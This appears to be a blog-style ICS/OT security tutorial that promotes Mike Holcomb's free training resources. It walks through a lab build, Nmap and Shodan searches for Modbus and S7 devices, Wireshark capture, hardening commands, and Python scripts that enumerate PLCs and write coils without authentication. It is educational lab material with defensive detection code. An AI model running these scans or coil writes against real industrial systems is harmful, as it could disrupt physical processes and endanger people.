UNLOCK 50+ HOURS OF FREE ICS/OT CYBERSECURITY TRAINING: Mike Holcomb’s Ultimate Resource Compilation + Video


Introduction:

Industrial Control Systems (ICS) and Operational Technology (OT) environments—power grids, water treatment plants, manufacturing lines—were designed for reliability, not security. As IT and OT converge, attackers increasingly target these critical infrastructures (e.g., Colonial Pipeline, Triton). Mike Holcomb’s curated list of free resources, including a 25+ hour course, 50+ YouTube hours, and a weekly newsletter, offers a no‑cost pathway to mastering OT/ICS defense.

Learning Objectives:

  • Identify and access top free ICS/OT cybersecurity training resources (courses, eBooks, videos, infographics).
  • Execute practical Linux/Windows commands and scripts to enumerate, monitor, and harden OT networks.
  • Apply ISA/IEC 62443 principles and basic penetration testing techniques to real‑world industrial environments.

You Should Know

  1. Build Your Own ICS/OT Virtual Lab – Free & Safe for Practice

What this does:

A virtual lab lets you simulate PLCs, HMIs, and industrial protocols without risking real equipment. You will use VirtualBox and open‑source tools (OpenPLC, GRFICS) to create a realistic training ground.

Step‑by‑step guide:

  1. Install VirtualBox (Linux: sudo apt install virtualbox; Windows: download from virtualbox.org).
  2. Download a pre‑built ICS VM – e.g., GRFICS v2 from Fortiphyd Logic (github.com/Fortiphyd/GRFICSv2), which ships the process simulation, PLC and HMI as separate VMs.

  3. Set up OpenPLC on an Ubuntu VM (the installer takes the target platform as its argument):

sudo apt update && sudo apt install -y git python3-pip
git clone https://github.com/thiagoralves/OpenPLC_v3.git
cd OpenPLC_v3
./install.sh linux

  4. Launch the web interface at `http://<plc-vm-ip>:8080` (default login openplc/openplc – change it immediately) and upload a simple ladder logic program.
  5. Configure a second "attacker" VM (Kali Linux) on the same virtual network. Use Host‑Only or an Internal Network: plain NAT puts each VM on its own private network, so the two VMs could not reach each other.
  6. Verify connectivity from attacker to PLC using ping and Nmap (covered in the next section). Keep the lab on a network that never touches real control equipment.

  2. Scanning OT Networks with Nmap – Discover Modbus, DNP3, and S7

What this does:

Nmap’s industrial‑protocol scripts identify live PLCs, services, and potential misconfigurations. These commands are safe for lab use but can disrupt live OT – never run on production.

Commands & examples:

  • Modbus/TCP discovery (port 502):
    nmap -sV -p 502 --script modbus-discover 192.168.1.0/24
    
  • DNP3 (TCP port 20000 – DNP3 is normally carried over TCP; UDP is allowed by the standard but uncommon). Stock Nmap ships no DNP3 NSE script, so locate the listener here and confirm the protocol in Wireshark (next section):
    nmap -sV -p 20000 192.168.1.100
    
  • Siemens S7‑300/400 (port 102):
    nmap -p 102 --script s7-info 192.168.1.10
    
  • Full OT port sweep with timing slowed down (to avoid flooding fragile devices): -T2 is the "polite" template and --max-rate caps packets per second; -T4 is aggressive and the opposite of relaxed. Port 44818 is EtherNet/IP, covered by the stock enip-info script:
    nmap -T2 --max-rate 20 -p 502,102,20000,44818 -sV --script modbus-discover,s7-info,enip-info -oA ot_scan 192.168.1.0/24
    
  • Windows alternative – use PowerShell and `Test-NetConnection` for basic port checks (keeps only hosts where the TCP connect succeeded):
    1..254 | ForEach-Object { Test-NetConnection -Port 502 -ComputerName "192.168.1.$_" -WarningAction SilentlyContinue } | Where-Object TcpTestSucceeded | Select-Object ComputerName, RemotePort
    
    

Step‑by‑step:

  1. Run `sudo nmap -sS -p 502 192.168.1.10` (replace IP with your lab PLC).
  2. If open, escalate to script scan: --script modbus-discover.
  3. Review output for unit identifiers, slave IDs, and read/write coil access.

  3. Capturing & Analyzing Industrial Protocols with Wireshark

What this does:

Wireshark reveals exactly what commands travel between HMI and PLC – invaluable for anomaly detection and forensics.

Filters & commands:

  • Capture only Modbus traffic – display filter `modbus` (the PDU layer) or `mbtcp` (the Modbus/TCP header layer); `tcp.port == 502` as a fallback for traffic Wireshark does not dissect.
  • Follow a Modbus/TCP stream – right‑click any packet → Follow → TCP Stream.
  • Summarise who talks to whom – Statistics → Conversations, TCP tab, with the `tcp.port == 502` display filter applied (Wireshark's Export Objects dialog has no Modbus exporter).
  • Linux CLI capture with tcpdump (open the file in Wireshark later):
    sudo tcpdump -i eth0 -s 0 -w ot_traffic.pcap 'tcp port 502 or tcp port 20000'
    
  • Windows equivalent (dumpcap ships with Wireshark; list interface numbers with `dumpcap -D`): `dumpcap -i 2 -f "tcp port 502" -w ot_traffic.pcapng`

Step‑by‑step guide:

  1. Start Wireshark on the attacker VM, select the interface connected to the OT lab network.
  2. Start capture, then from your HMI (or from the attacker VM with the modbus-cli Ruby gem, which addresses coils in Schneider %M notation) write a coil on the lab PLC:
    modbus write 192.168.1.10 %M1 1
    
  3. Stop capture and apply filter `modbus.func_code == 5` (write single coil).
  4. Observe how a simple write command appears in clear text – demonstrates lack of encryption in legacy Modbus.
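The decoding Wireshark performs behind the `modbus.func_code == 5` filter, written out in Python as an added example (not code from the original post or from Mike Holcomb's material): it parses the 7‑byte MBAP header and the PDU of Modbus/TCP frames and raises an alert whenever a write function code arrives from a source that is not the HMI. The frames are hand‑built for this demo rather than captured, and the IP addresses and the HMI allow‑list are assumptions.

```python
"""Decode Modbus/TCP frames and flag write requests from hosts that are not the HMI."""
import struct
from dataclasses import dataclass

# Function codes that change PLC state. Bit 0x80 set in a response means an exception.
WRITE_FUNCS = {5: "Write Single Coil", 6: "Write Single Register",
               15: "Write Multiple Coils", 16: "Write Multiple Registers"}
READ_FUNCS = {1: "Read Coils", 2: "Read Discrete Inputs",
              3: "Read Holding Registers", 4: "Read Input Registers"}


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    payload: bytes          # PDU bytes after the function code


def decode_frame(data: bytes) -> ModbusFrame:
    """Parse the 7-byte MBAP header (tid, protocol id, length, unit id) and the PDU."""
    if len(data) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", data[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus (expected 0)")
    # 'length' counts the unit id and the PDU, so the whole frame is 6 + length bytes.
    if len(data) != 6 + length:
        raise ValueError("MBAP length field does not match the frame size")
    return ModbusFrame(tid, unit, data[7], data[8:])


def describe(frame: ModbusFrame) -> str:
    """Human-readable summary of one request or response PDU."""
    fc = frame.function_code
    if fc & 0x80:
        return f"exception response to FC{fc & 0x7F}, code {frame.payload[0]}"
    if fc == 5:
        addr, value = struct.unpack(">HH", frame.payload[:4])
        return f"Write Single Coil addr={addr} -> {'ON' if value == 0xFF00 else 'OFF'}"
    if fc == 6:
        addr, value = struct.unpack(">HH", frame.payload[:4])
        return f"Write Single Register addr={addr} value={value}"
    if fc in (15, 16):
        addr, qty = struct.unpack(">HH", frame.payload[:4])
        return f"{WRITE_FUNCS[fc]} addr={addr} count={qty}"
    if fc in READ_FUNCS and len(frame.payload) >= 4:
        addr, qty = struct.unpack(">HH", frame.payload[:4])
        return f"{READ_FUNCS[fc]} addr={addr} count={qty}"
    return f"FC{fc} with {len(frame.payload)} payload bytes"


def flag_writes(packets, allowed_writers):
    """Alerts for write requests whose source is not in the HMI allow-list.

    packets: iterable of (src_ip, raw_frame_bytes), the shape a pcap reader hands over."""
    alerts = []
    for src, raw in packets:
        frame = decode_frame(raw)
        if frame.function_code in WRITE_FUNCS and src not in allowed_writers:
            alerts.append(f"{src} -> unit {frame.unit_id}: unauthorized {describe(frame)}")
    return alerts


# Constructed sample frames for this demo (hand-built, not captured from a real device).
SAMPLE_PACKETS = [
    # HMI polls 10 holding registers from address 0: normal traffic
    ("192.168.1.20", bytes.fromhex("0001 0000 0006 01 03 0000 000A")),
    # HMI writes coil 1 ON: legitimate operator action
    ("192.168.1.20", bytes.fromhex("0002 0000 0006 01 05 0001 FF00")),
    # attacker VM writes coil 5 ON: the write this section tells you to look for
    ("192.168.1.50", bytes.fromhex("0003 0000 0006 01 05 0005 FF00")),
    # attacker VM writes register 10 = 1234
    ("192.168.1.50", bytes.fromhex("0004 0000 0006 01 06 000A 04D2")),
    # PLC answers a bad request with exception 02 (Illegal Data Address)
    ("192.168.1.10", bytes.fromhex("0005 0000 0003 01 86 02")),
]

if __name__ == "__main__":
    for src, raw in SAMPLE_PACKETS:
        print(f"{src:14} {describe(decode_frame(raw))}")
    for alert in flag_writes(SAMPLE_PACKETS, allowed_writers={"192.168.1.20"}):
        print("ALERT:", alert)
```

The allow‑list is the whole detection: Modbus carries no authentication, so the only thing that distinguishes the operator's coil write from the attacker's is the source address, which is why asset inventory and a fixed list of hosts permitted to write matter more than any per‑packet signature.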

  4. Hardening Windows‑Based Engineering Workstations (EWS)

What this does:

Most OT engineers use Windows workstations connected to PLCs. Attackers pivot through these hosts. Below commands disable risky defaults.

PowerShell (run as Administrator):

# Disable unnecessary services (Print Spooler) and LLMNR name resolution
Set-Service -Name Spooler -StartupType Disabled
Stop-Service -Name Spooler -Force
# LLMNR is not a service; it is switched off through the DNS client policy key
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name EnableMulticast -Type DWord -Value 0

# Restrict RDP to the OT subnet (replace 192.168.1.0/24). Scoping the built‑in rule group is
# safer than adding a second allow rule next to an unrestricted one
netsh advfirewall firewall set rule group="remote desktop" new enable=yes remoteip=192.168.1.0/24

# Block outbound SMB (port 445) to prevent lateral movement; for an outbound rule the
# port that matters is the RemotePort
New-NetFirewallRule -DisplayName "Block SMB Outbound" -Direction Outbound -Protocol TCP -RemotePort 445 -Action Block

Linux (if an EWS runs Ubuntu) – disable unnecessary listeners:

sudo systemctl disable --now cups-browsed avahi-daemon
sudo ufw default deny incoming
sudo ufw allow from 192.168.1.0/24 to any port 22 proto tcp   # SSH only from the OT net
sudo ufw enable

Step‑by‑step:

  1. List all open ports on the EWS: `netstat -ano` (Windows; -o shows the owning process ID) or `ss -tulnp` (Linux).
  2. Apply above firewall rules to lock down non‑essential ports.
  3. Test connectivity from a non‑OT IP – should fail for RDP and SMB.

  5. Using Shodan to Identify Exposed ICS Devices (with API)

What this does:

Shodan indexes internet‑connected devices. Many organizations accidentally expose PLCs, RTUs, or HMIs. This tutorial shows how to query Shodan ethically (only on your own assets or with permission).

Commands (Linux/macOS with Shodan CLI; API searches consume query credits, so check your plan's allowance):

# Install Shodan CLI
pip3 install shodan
shodan init YOUR_API_KEY

# Search for Modbus devices in a specific country
shodan search --limit 10 'port:502 modbus country:"US"'

# Look for Niagara Fox (building automation) on its default ports
shodan search 'port:1911,4911 product:"Niagara"'

# Get detailed info on an exposed IP (replace IP)
shodan host 203.0.113.5

Windows – use the browser or PowerShell (Invoke-RestMethod against the Shodan REST API; the query string must be URL‑encoded):

$apiKey = "YOUR_API_KEY"
$search = [uri]::EscapeDataString('port:502 country:"US"')
$url = "https://api.shodan.io/shodan/host/search?key=$apiKey&query=$search"
(Invoke-RestMethod -Uri $url).matches | Select-Object ip_str, port, org | Format-Table

Step‑by‑step:

  1. Sign up at shodan.io (free tier).
  2. Run a search for `"siemens s7" port:102` – note how many are live.
  3. Never attempt to connect without written authorization – use only for awareness and to convince management of exposure.

  6. Basic Modbus Enumeration with Python (pymodbus)

What this does:

Automate reading/writing coils and registers to test authorization controls and discover undocumented memory areas.

Python script (run from the attacker VM; written for pymodbus 3.x, where the unit‑id keyword is slave= – it was unit= in 2.x and the name has changed again in later releases, so run help(client.read_coils) to confirm for your install):

from pymodbus.client import ModbusTcpClient

PLC_IP = "192.168.1.10"   # your lab PLC

client = ModbusTcpClient(PLC_IP, port=502)
if not client.connect():
    raise SystemExit(f"could not connect to {PLC_IP}:502")

# Read holding registers (address 0, count 10)
rr = client.read_holding_registers(0, count=10, slave=1)
if rr.isError():
    print(f"Error: {rr}")
else:
    print(f"Holding registers: {rr.registers}")

# Write a single coil (address 5, ON) – this changes PLC state; lab devices only
wq = client.write_coil(5, True, slave=1)
print("Write coil 5:", "rejected" if wq.isError() else "accepted")

# Read coils 0-15 back to confirm the write took effect
coils = client.read_coils(0, count=16, slave=1)
if not coils.isError():
    print(f"Coil values: {coils.bits[:16]}")

client.close()

Step‑by‑step:

  1. Install pymodbus: `pip3 install pymodbus`.
  2. Save the script as `modbus_enum.py` and run: python3 modbus_enum.py.
  3. Observe that without authentication or access controls you can change coil states – this is a major OT risk.
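The unit‑id sweep and function‑code probing that nmap's modbus-discover performs, plus the unauthenticated coil write the pymodbus script shows, as an added example that is not part of the original post and does not come from the pymodbus project. It uses raw sockets so it needs no third‑party package, and it talks to FakePlc, a constructed loopback responder that stands in for a PLC (unit id 1 only; FC1, FC3 and FC5 implemented; every other function code answered with an Illegal Function exception). Host, ports, coil numbers and the candidate unit ids are assumptions for the demo.

```python
"""Loopback demo: sweep Modbus unit ids, probe accepted function codes, then show that
a coil can be written with no authentication. FakePlc is a constructed stand-in."""
import socket
import struct
import threading


class FakePlc:
    """Minimal Modbus/TCP responder: unit 1 only, 16 coils, FC1/FC3/FC5 implemented,
    any other function code answered with exception 0x01 (Illegal Function)."""
    def __init__(self):
        self.coils = [False] * 16
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", 0))             # ephemeral port, loopback only
        srv.listen(5)
        self.port = srv.getsockname()[1]
        threading.Thread(target=self._serve, args=(srv,), daemon=True).start()

    def _handle(self, unit, fc, data):
        if unit != 1:
            return None                        # silent, like an absent unit id
        if fc == 1:                            # Read Coils
            addr, qty = struct.unpack(">HH", data[:4])
            bits = self.coils[addr:addr + qty]
            packed = bytearray((len(bits) + 7) // 8)
            for i, on in enumerate(bits):
                if on:
                    packed[i // 8] |= 1 << (i % 8)
            return bytes([1, len(packed)]) + bytes(packed)
        if fc == 3:                            # Read Holding Registers (all zero here)
            addr, qty = struct.unpack(">HH", data[:4])
            return bytes([3, 2 * qty]) + b"\x00\x00" * qty
        if fc == 5:                            # Write Single Coil: no auth check at all
            addr, value = struct.unpack(">HH", data[:4])
            self.coils[addr] = value == 0xFF00
            return bytes([5]) + data[:4]       # success = echo of the request
        return bytes([fc | 0x80, 0x01])        # Illegal Function exception

    def _serve(self, srv):
        while True:
            conn, _ = srv.accept()
            with conn:
                while True:
                    hdr = conn.recv(7)
                    if len(hdr) < 7:
                        break
                    tid, _, length, unit = struct.unpack(">HHHB", hdr)
                    pdu = conn.recv(length - 1)
                    resp = self._handle(unit, pdu[0], pdu[1:])
                    if resp is not None:
                        conn.sendall(struct.pack(">HHHB", tid, 0, len(resp) + 1, unit) + resp)


def modbus_request(host, port, unit, fc, data=b"", timeout=0.5):
    """One MBAP+PDU exchange; returns (function_code, payload) or None when nothing answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(struct.pack(">HHHB", 1, 0, len(data) + 2, unit) + bytes([fc]) + data)
            hdr = s.recv(7)
            if len(hdr) < 7:
                return None
            length = struct.unpack(">HHHB", hdr)[2]
            pdu = s.recv(length - 1)
    except socket.timeout:
        return None
    return pdu[0], pdu[1:]


# Read-only probes (function code -> request data); none of these changes PLC state.
READ_PROBES = {1: struct.pack(">HH", 0, 1), 2: struct.pack(">HH", 0, 1),
               3: struct.pack(">HH", 0, 1), 4: struct.pack(">HH", 0, 1),
               7: b"", 17: b"", 43: b"\x0e\x01\x00"}


def find_unit_ids(host, port, candidates):
    """Unit ids that answer an FC3 read, the sweep modbus-discover performs."""
    return [u for u in candidates if modbus_request(host, port, u, 3, READ_PROBES[3])]


def probe_function_codes(host, port, unit=1):
    """Map each probed function code to 'supported', 'illegal' or 'no-reply'."""
    out = {}
    for fc, data in READ_PROBES.items():
        r = modbus_request(host, port, unit, fc, data)
        if r is None:
            out[fc] = "no-reply"
        elif r[0] & 0x80 and r[1][:1] == b"\x01":
            out[fc] = "illegal"
        else:
            out[fc] = "supported"
    return out


def unauthenticated_write(host, port, coil, unit=1):
    """Write one coil ON and read it back; True means an arbitrary client changed
    PLC state. Run this ONLY against a lab device."""
    modbus_request(host, port, unit, 5, struct.pack(">HH", coil, 0xFF00))
    r = modbus_request(host, port, unit, 1, struct.pack(">HH", coil, 1))
    return r is not None and r[0] == 1 and bool(r[1][1] & 1)


if __name__ == "__main__":
    plc = FakePlc()
    print("unit ids:", find_unit_ids("127.0.0.1", plc.port, range(0, 4)))
    print("function codes:", probe_function_codes("127.0.0.1", plc.port))
    print("coil 5 written without auth:", unauthenticated_write("127.0.0.1", plc.port, 5))
```

Against a real device keep the unit‑id sweep and the read‑only probes, and drop the write unless the test plan explicitly authorises state changes; a silent unit id, an Illegal Function exception and a successful echo are the three answers that tell you what the PLC exposes.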

  7. Implementing ISA/IEC 62443 – A Quick Hardening Checklist

What this does:

The ISA/IEC 62443 series defines security levels (SL1–SL4) for IACS. Below are actionable steps based on the standard.

Checklist & commands (apply on network devices, firewalls, PLCs):
– Network segmentation (IEC 62443‑3‑3, SR 5.1): put OT in its own zone behind a firewall. A VLAN on its own is not an air gap, so the conduit between zones needs explicit rules. On a Linux router:

# Create VLAN for OT
ip link add link eth0 name eth0.10 type vlan id 10
ip addr add 192.168.10.1/24 dev eth0.10
ip link set eth0.10 up
iptables -A FORWARD -i eth0.10 -o eth0 -j DROP   # block OT→IT by default

– Disable unused protocols on PLCs (e.g., FTP, HTTP) – consult the vendor manual.
– Enable logging on switches/routers (syslog to a secure collector):

! Example on Cisco IOS
logging host 192.168.100.50
logging trap warnings

– Default and hard‑coded credentials – change every vendor default password; the defaults are printed in the manuals and collected in public default‑password lists, so attackers already know them.
– Windows security baseline – apply the Microsoft Security Compliance Toolkit baselines to engineering workstations, then relax only the settings your vendor's engineering software documents as required.

Step‑by‑step:

  1. Identify your target security level (SL1 = protection against casual or coincidental misuse; SL4 = protection against attackers with sophisticated means and extended resources).
  2. Implement zone and conduit model – define OT zone, IT zone, and conduits (e.g., firewall rules).
  3. Test from IT zone: try to ping an OT PLC – should fail if correctly segmented.
  4. Review logs weekly using a SIEM (e.g., Splunk free tier, Wazuh).

What Undercode Say:

  • Key Takeaway 1: Free, high‑quality OT/ICS training is abundant – Mike Holcomb’s resources (YouTube, eBooks, 25+ hour course) remove the “expensive barrier” argument for getting started.
  • Key Takeaway 2: Practical skills require a lab and hands‑on commands. Without tools like Nmap, Modbus‑client, or Wireshark filters, theory alone won’t defend industrial networks.

Analysis (≈10 lines):

The convergence of IT and OT means that traditional security professionals must now understand Modbus, DNP3, and ladder logic – yet most training remains locked behind paywalls. Holcomb’s compilation lowers that barrier, but the bigger issue is organizational inertia: many plant managers still believe “air gap” equals safety. The commands and steps above (especially Shodan scans and Modbus enumeration) prove otherwise – exposure is rampant. The most valuable resource listed is the ISA/IEC 62443 course, because standards drive budgets. However, free resources only help if practitioners actually build labs. The newsletter with 8,200+ subscribers indicates growing awareness, but that’s a fraction of the needed workforce. Expect a surge in OT‑focused CTFs and home‑lab tutorials as these links spread.

Prediction:

  • +1 Increased adoption of free OT training will expand the pool of qualified ICS incident responders, shortening breach detection times.
  • +1 Open‑source tools (like OpenPLC and pymodbus) will become standard teaching aids in universities, leading to more secure defaults in next‑gen industrial devices.
  • -1 Attackers will also use these same resources (e.g., Shodan dorks, Modbus scripts) to refine their targeting of exposed critical infrastructure – awareness alone is not defense.
  • -1 Without parallel investment in secure remote access and asset inventory, the proliferation of free “pen testing” content may lead to amateur practitioners taking down production lines.


Reported By: Mikeholcomb Want – Hackers Feeds
